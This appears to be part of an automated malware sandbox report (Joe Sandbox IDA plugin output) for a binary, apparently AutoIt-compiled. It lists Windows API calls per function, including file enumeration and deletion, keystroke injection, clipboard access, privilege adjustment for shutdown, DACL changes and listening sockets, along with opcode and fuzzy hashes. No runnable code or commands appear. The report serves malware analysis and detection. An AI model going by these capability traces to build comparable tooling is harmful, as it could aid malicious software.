                                                                                                                              • Opcode Fuzzy Hash: 677a7ee6b50b97392eb99c771eb6a124aad92fd0200352cfd39a02f6ab6367d6
                                                                                                                              • Instruction Fuzzy Hash: 39614972108304AFC701EF64EC85EAFBBF9BF99710F004A1EF595961A1DB709A45CB62
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001C21C0
• _wcscmp.LIBCMT ref: 001C21D5
• _wcscmp.LIBCMT ref: 001C21EC
  • Part of subcall function 001B7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001B7621
• FindNextFileW.KERNEL32(00000000,?), ref: 001C221B
• FindClose.KERNEL32(00000000), ref: 001C2226
• FindFirstFileW.KERNEL32(*.*,?), ref: 001C2242
• _wcscmp.LIBCMT ref: 001C2269
• _wcscmp.LIBCMT ref: 001C2280
• SetCurrentDirectoryW.KERNEL32(?), ref: 001C2292
• SetCurrentDirectoryW.KERNEL32(00223A68), ref: 001C22B0
• FindNextFileW.KERNEL32(00000000,00000010), ref: 001C22BA
• FindClose.KERNEL32(00000000), ref: 001C22C7
• FindClose.KERNEL32(00000000), ref: 001C22D7
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
APIs
Strings
Similarity
• API ID: _memmove_memset
• String ID: Q\E$[$\$\$\$]$^
• API String ID: 3555123492-286096704
APIs
  • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001DED0C
• GetFocus.USER32 ref: 001DED1C
• GetDlgCtrlID.USER32(00000000), ref: 001DED27
• _memset.LIBCMT ref: 001DEE52
• GetMenuItemInfoW.USER32 ref: 001DEE7D
• GetMenuItemCount.USER32(00000000), ref: 001DEE9D
• GetMenuItemID.USER32(?,00000000), ref: 001DEEB0
• GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 001DEEE4
• GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 001DEF2C
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001DEF64
• NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 001DEF99
Strings
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
• String ID: 0
• API String ID: 3616455698-4108050209
APIs
  • Part of subcall function 001AB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 001AB903
  • Part of subcall function 001AB8E7: GetLastError.KERNEL32(?,001AB3CB,?,?,?), ref: 001AB90D
  • Part of subcall function 001AB8E7: GetProcessHeap.KERNEL32(00000008,?,?,001AB3CB,?,?,?), ref: 001AB91C
  • Part of subcall function 001AB8E7: RtlAllocateHeap.NTDLL(00000000,?,001AB3CB), ref: 001AB923
  • Part of subcall function 001AB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 001AB93A
  • Part of subcall function 001AB982: GetProcessHeap.KERNEL32(00000008,001AB3E1,00000000,00000000,?,001AB3E1,?), ref: 001AB98E
  • Part of subcall function 001AB982: RtlAllocateHeap.NTDLL(00000000,?,001AB3E1), ref: 001AB995
  • Part of subcall function 001AB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001AB3E1,?), ref: 001AB9A6
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001AB3FC
• _memset.LIBCMT ref: 001AB411
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001AB430
• GetLengthSid.ADVAPI32(?), ref: 001AB441
• GetAce.ADVAPI32(?,00000000,?), ref: 001AB47E
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001AB49A
• GetLengthSid.ADVAPI32(?), ref: 001AB4B7
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001AB4C6
• RtlAllocateHeap.NTDLL(00000000), ref: 001AB4CD
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 001AB4EE
• CopySid.ADVAPI32(00000000), ref: 001AB4F5
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001AB526
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001AB54C
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 001AB560
Similarity
• API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 2347767575-0
APIs
  • Part of subcall function 001731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001731DA
  • Part of subcall function 001B7C0C: GetFileAttributesW.KERNEL32(?,001B6A7B), ref: 001B7C0D
• _wcscat.LIBCMT ref: 001B6E7E
• __wsplitpath.LIBCMT ref: 001B6E99
• FindFirstFileW.KERNEL32(?,?), ref: 001B6EAE
• _wcscpy.LIBCMT ref: 001B6EDD
• _wcscat.LIBCMT ref: 001B6EEF
• _wcscat.LIBCMT ref: 001B6F01
• DeleteFileW.KERNEL32(?), ref: 001B6F0E
• FindNextFileW.KERNEL32(00000000,00000010), ref: 001B6F22
• FindClose.KERNEL32(00000000), ref: 001B6F3D
Strings
Similarity
• API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
• String ID: \*.*
• API String ID: 2643075503-1173974218
Strings
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                              • API String ID: 0-2893523900
                                                                                                                              • Opcode ID: 50c0d3672ffe6b33bd755b6eb99faaaa65baa2451d571ac1b2ecac19d44ca150
                                                                                                                              • Instruction ID: eae8d1947284003b5a8936075015ece4cc819abcd2e4615246961cc7217f458d
                                                                                                                              • Opcode Fuzzy Hash: 50c0d3672ffe6b33bd755b6eb99faaaa65baa2451d571ac1b2ecac19d44ca150
                                                                                                                              • Instruction Fuzzy Hash: 4862A3B1E00619DBDF28CF99C8807BEB7B5BF48310F15816AE959EB281D7749E41CB90
APIs
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: e7b5d10e12a85acc605157d85d17241e20a2941706d5399a94b437de1a607802
• Instruction ID: d6ce6b7feab5ee76d584b1995c4bb831e87e54d777d9f8c76ddc0cb6eab61ad7
• Opcode Fuzzy Hash: e7b5d10e12a85acc605157d85d17241e20a2941706d5399a94b437de1a607802
• Instruction Fuzzy Hash: 19218B31244211AFDB05AF65EC59F7DBBA9EF64720F008019F90ADB2A1DB70E980DF91
APIs
  • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 001C24F6
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 001C2526
• _wcscmp.LIBCMT ref: 001C253A
• _wcscmp.LIBCMT ref: 001C2555
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001C25F3
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 001C2609
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
• String ID: *.*
• API String ID: 713712311-438819550
• Opcode ID: 1e5475f73576960a71ef99e20ab67278b6f34422b212129844b72435853f3893
• Instruction ID: 8e7d5c2feb1c8dc2456f0426d3d82f4a759811087d819c52b8f19a0eb078af33
• Opcode Fuzzy Hash: 1e5475f73576960a71ef99e20ab67278b6f34422b212129844b72435853f3893
• Instruction Fuzzy Hash: 3B415C7190421AAFCF15DFA4CC59FEEBBB4BF29310F10445AE815A2191E734DA94CFA0
APIs
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: a1d843ed92a146b356631b9865471220485a4843621ba20420c6204086a2512c
• Instruction ID: 62b744b4cc9c80ce954afa1e6821d2c085918b9e9ee0c21a67544ee4ffabe1fe
• Opcode Fuzzy Hash: a1d843ed92a146b356631b9865471220485a4843621ba20420c6204086a2512c
• Instruction Fuzzy Hash: E9128F70A00609EFDF18DFA5D995AAEB7F9FF58300F208569E40AE7250EB35AD11CB50
APIs
  • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
  • Part of subcall function 0018B736: GetCursorPos.USER32(000000FF), ref: 0018B749
  • Part of subcall function 0018B736: ScreenToClient.USER32(00000000,000000FF), ref: 0018B766
  • Part of subcall function 0018B736: GetAsyncKeyState.USER32(00000001), ref: 0018B78B
  • Part of subcall function 0018B736: GetAsyncKeyState.USER32(00000002), ref: 0018B799
• ReleaseCapture.USER32 ref: 001DEB1A
• SetWindowTextW.USER32(?,00000000), ref: 001DEBC2
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001DEBD5
• NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 001DECAE
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 973565025-2107944366
• Opcode ID: 163f192ce8841a3844edd3e5d426a5814e113a0c0fa0f1e9d58c39b7c2cf925b
• Instruction ID: ad44f05062bcdee6f2f899aed32b95d799dcea64214244e67da9f85ced99012d
• Opcode Fuzzy Hash: 163f192ce8841a3844edd3e5d426a5814e113a0c0fa0f1e9d58c39b7c2cf925b
• Instruction Fuzzy Hash: 0C518971214304AFE700EF24EC96FAA7BE5BB98705F00491AF5859B2E2DB709954CB62
APIs
  • Part of subcall function 001ABEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001ABF0F
  • Part of subcall function 001ABEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001ABF3C
  • Part of subcall function 001ABEC3: GetLastError.KERNEL32 ref: 001ABF49
• ExitWindowsEx.USER32(?,00000000), ref: 001B830C
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
• Opcode ID: 0ec0fad98b1633faccf13bb77a2a089c4e72789a26e20ed63e84d89b497d47c6
• Instruction ID: bcd56fbc52ec3db2975b779977896e2edc184ac653d1ef8f66afba63e02a7500
• Opcode Fuzzy Hash: 0ec0fad98b1633faccf13bb77a2a089c4e72789a26e20ed63e84d89b497d47c6
• Instruction Fuzzy Hash: 54018475654211AAE76866789C8ABFB72ACBB11F80F180424F943D51E2DF64DC00C1A4
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001C9235
• WSAGetLastError.WS2_32(00000000), ref: 001C9244
• bind.WS2_32(00000000,?,00000010), ref: 001C9260
• listen.WS2_32(00000000,00000005), ref: 001C926F
• WSAGetLastError.WS2_32(00000000), ref: 001C9289
• closesocket.WS2_32(00000000), ref: 001C929D
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
• Opcode ID: de4c02d8d906aba2c09229cfe712b88d3e17ff500b9809ed607d45f43435c708
• Instruction ID: 10efa30071f72f347532563c20f9536cf3e848f8b31c59b44a2f80348ca6736b
• Opcode Fuzzy Hash: de4c02d8d906aba2c09229cfe712b88d3e17ff500b9809ed607d45f43435c708
• Instruction Fuzzy Hash: 81217E35600200AFCB14EF64D889FBEB7A9AF54728F10815DF996AB691CB70ED41CB91
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID: hN"$tM"
                                                                                                                              • API String ID: 4104443479-1199129293
                                                                                                                              • Opcode ID: 90f9f0e32c25521491d18a2e0246c9db8766887cde6c5b8a1af78f1c8687912c
                                                                                                                              • Instruction ID: f42ce09956a445b1364561a8f739bb7b8d5867254fe842b324a2924eef91a126
                                                                                                                              • Opcode Fuzzy Hash: 90f9f0e32c25521491d18a2e0246c9db8766887cde6c5b8a1af78f1c8687912c
                                                                                                                              • Instruction Fuzzy Hash: 64A27B75E00619CFDB28CF58C8806ADBBB1FF48314F2581AAE959AB391D7749E81CF50
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0019010A: std::exception::exception.LIBCMT ref: 0019013E
                                                                                                                                • Part of subcall function 0019010A: __CxxThrowException@8.LIBCMT ref: 00190153
                                                                                                                              • _memmove.LIBCMT ref: 001E3020
                                                                                                                              • _memmove.LIBCMT ref: 001E3135
                                                                                                                              • _memmove.LIBCMT ref: 001E31DC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1300846289-0
                                                                                                                              • Opcode ID: 897c279bce6071158e51afaeaa4ba8bc5094495ee8eaa61ddb52fcecc148d698
                                                                                                                              • Instruction ID: 7e997cf5fd815ebd2fe21e6465d8a4e032d2f3ca7671f5e9c0ca01d1a65cde84
                                                                                                                              • Opcode Fuzzy Hash: 897c279bce6071158e51afaeaa4ba8bc5094495ee8eaa61ddb52fcecc148d698
                                                                                                                              • Instruction Fuzzy Hash: 7202AF70A00209EFCF08DF65D885AAEB7B5EF98300F55C069F80ADB255EB31DA55CB91
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001CACD3: inet_addr.WS2_32(00000000), ref: 001CACF5
                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 001C973D
                                                                                                                              • WSAGetLastError.WS2_32(00000000,00000000), ref: 001C9760
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastinet_addrsocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4170576061-0
                                                                                                                              • Opcode ID: ef84316b351d76cd3c555647b6f32daa650bf40ea069b95b492e63e14f5551bc
                                                                                                                              • Instruction ID: f4954ecf8aa466c98719aacbf869acce06d658933392231b6441961662f45473
                                                                                                                              • Opcode Fuzzy Hash: ef84316b351d76cd3c555647b6f32daa650bf40ea069b95b492e63e14f5551bc
                                                                                                                              • Instruction Fuzzy Hash: AB41B071600204AFDB14AF24C886EBE77EDEF54728F14814CF956AB392DB749E418B91
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 001BF37A
                                                                                                                              • _wcscmp.LIBCMT ref: 001BF3AA
                                                                                                                              • _wcscmp.LIBCMT ref: 001BF3BF
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 001BF3D0
                                                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 001BF3FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2387731787-0
                                                                                                                              • Opcode ID: 059297aa63994f79aecd310d35091bd043faae9556c2b2bb53f91993e69c15cf
                                                                                                                              • Instruction ID: 76104fbf7acc54edd0c2072a6ba3a3abe2160434527f4273600c0d5a715c2fd7
                                                                                                                              • Opcode Fuzzy Hash: 059297aa63994f79aecd310d35091bd043faae9556c2b2bb53f91993e69c15cf
                                                                                                                              • Instruction Fuzzy Hash: D1419B356043029FCB08DF28C890AAAB3E4FF59324F10456DE95ACB3A1DB31E946CF91
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 001B439C
                                                                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 001B43B8
                                                                                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 001B4425
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 001B4483
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 432972143-0
                                                                                                                              • Opcode ID: 8fd05b34e033b05962a2b7e8fa81b62966b2d65e48b20c90f1ddcacc7166a91e
                                                                                                                              • Instruction ID: 217dff58aaa14916b1b8e952c196e05fc5ade39fec49c13a1cc241eaba5ac7ec
                                                                                                                              • Opcode Fuzzy Hash: 8fd05b34e033b05962a2b7e8fa81b62966b2d65e48b20c90f1ddcacc7166a91e
                                                                                                                              • Instruction Fuzzy Hash: 674126B0A00258ABEF348B65D8087FDBBB5AB59311F04811AF491932D2CB748DA5D762
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • GetCursorPos.USER32(?), ref: 001DEFE2
                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001EF3C3,?,?,?,?,?), ref: 001DEFF7
                                                                                                                              • GetCursorPos.USER32(?), ref: 001DF041
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,001EF3C3,?,?,?), ref: 001DF077
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
